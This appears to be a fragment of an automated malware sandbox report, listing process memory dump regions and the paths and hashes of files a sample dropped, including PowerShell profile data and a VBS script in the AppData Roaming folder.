| SHA1 | 9374d05486b0b62977825d07f748fa03cca3c864 |
| SHA256 | 84c422d2ccda03230c8eecda7daa2e4ffa00a89d862bed459be52875dde096b6 |
| SHA512 | c5f147e4d011342d3518416b0d5d30f5adc8eeadac2b060a94abdd80ef8452a61cca997831d69473a13b52ad7aa8acb2ddf507dd3f49f68dfddaf6cbd7c23c94 |
memory/4396-123-0x0000017EC8ED0000-0x0000017EC8F20000-memory.dmp
memory/4396-124-0x0000017EC8FE0000-0x0000017EC9092000-memory.dmp
memory/4396-125-0x0000017EC9D60000-0x0000017EC9F22000-memory.dmp
memory/3008-130-0x00007FFF29BE0000-0x00007FFF2A5CC000-memory.dmp
memory/3008-132-0x000001856BDA0000-0x000001856BDB0000-memory.dmp
memory/3008-133-0x000001856BDA0000-0x000001856BDB0000-memory.dmp
memory/3008-146-0x000001856BDA0000-0x000001856BDB0000-memory.dmp
memory/3008-151-0x000001856BD90000-0x000001856BD98000-memory.dmp
memory/3008-152-0x000001856BED0000-0x000001856BEDC000-memory.dmp
memory/2292-161-0x00007FFF29BE0000-0x00007FFF2A5CC000-memory.dmp
memory/2292-162-0x00000205B5E00000-0x00000205B5E10000-memory.dmp
memory/2292-165-0x00000205B5E00000-0x00000205B5E10000-memory.dmp
memory/2292-181-0x00000205B5E00000-0x00000205B5E10000-memory.dmp
memory/4396-198-0x00007FFF29BE0000-0x00007FFF2A5CC000-memory.dmp
memory/2292-201-0x00000205B5E00000-0x00000205B5E10000-memory.dmp
memory/2292-206-0x00007FFF29BE0000-0x00007FFF2A5CC000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 4a19d2f0bbbfd0b860dd34dc7422b58b |
| SHA1 | 4334057c7d2792735d2461ffbcfa3c796f79e1c3 |
| SHA256 | 7edd03ffa0d38ffbc336e31b6b1f4bbdbad99605e79f473e37362867623ae259 |
| SHA512 | 018ee82f304d0f49e463cfd13bac9a2968ea543c82e7981334acf5506d2f8040eb689da8cd45b6c1ca08fa14ec47a43762525352aac33d4863bccd33fad3827e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 6c59ae289c6cd378ba3c32219b44ae24 |
| SHA1 | eb064e026f4ea176716ed4ec2ede9e66f196d2aa |
| SHA256 | fdc6f52488f057437990155aba3dd308b7ed4faee73fe7cf9d21e53b8a952cd6 |
| SHA512 | e80b7deeef7a5fe16b6aef7a894c45da1ccc79d8a5360b36a664a2a36867be3f0350a06458629f8d0e7671b4b0e0d2050efbc0cde61e068cb60a6719fb67dadc |
C:\Users\Admin\AppData\Roaming\startup_str_991.vbs
| MD5 | 31ad013b3aa57b3fbb6cb1e560d05fe7 |
| SHA1 | fd7e96db28efd6baed7cd97e90dadb8f58b0c162 |
| SHA256 | fff219810b246a986ec84d671e01e2cf55a95c27fdfae873f8eba20cd24a5dfb |
| SHA512 | f1c95d6ac70f5bd862fd48a2e47036e48f80e7b0bf650856e4d8d8f5491d06af5364e98dd1bca50fda9a424e161c440193b312e748f0dd2fdd553f28743d1c28 |
memory/4396-223-0x0000017EAFDB0000-0x0000017EAFDC0000-memory.dmp
memory/4396-225-0x0000017EAFDB0000-0x0000017EAFDC0000-memory.dmp
memory/4420-227-0x00007FFF29BE0000-0x00007FFF2A5CC000-memory.dmp
memory/4420-228-0x000001E82CE60000-0x000001E82CE70000-memory.dmp
memory/3008-230-0x00007FFF29BE0000-0x00007FFF2A5CC000-memory.dmp
memory/4420-232-0x000001E82CE60000-0x000001E82CE70000-memory.dmp
memory/4396-233-0x0000017EAFDB0000-0x0000017EAFDC0000-memory.dmp
memory/3008-244-0x000001856BDA0000-0x000001856BDB0000-memory.dmp
memory/4420-247-0x000001E82CE60000-0x000001E82CE70000-memory.dmp
memory/4420-250-0x000001E8455F0000-0x000001E8455FE000-memory.dmp
memory/3008-254-0x00007FFF29BE0000-0x00007FFF2A5CC000-memory.dmp
memory/4396-255-0x00007FFF29BE0000-0x00007FFF2A5CC000-memory.dmp
memory/4420-256-0x00007FFF29BE0000-0x00007FFF2A5CC000-memory.dmp
memory/4420-257-0x000001E82CE60000-0x000001E82CE70000-memory.dmp
memory/4420-258-0x000001E82CE60000-0x000001E82CE70000-memory.dmp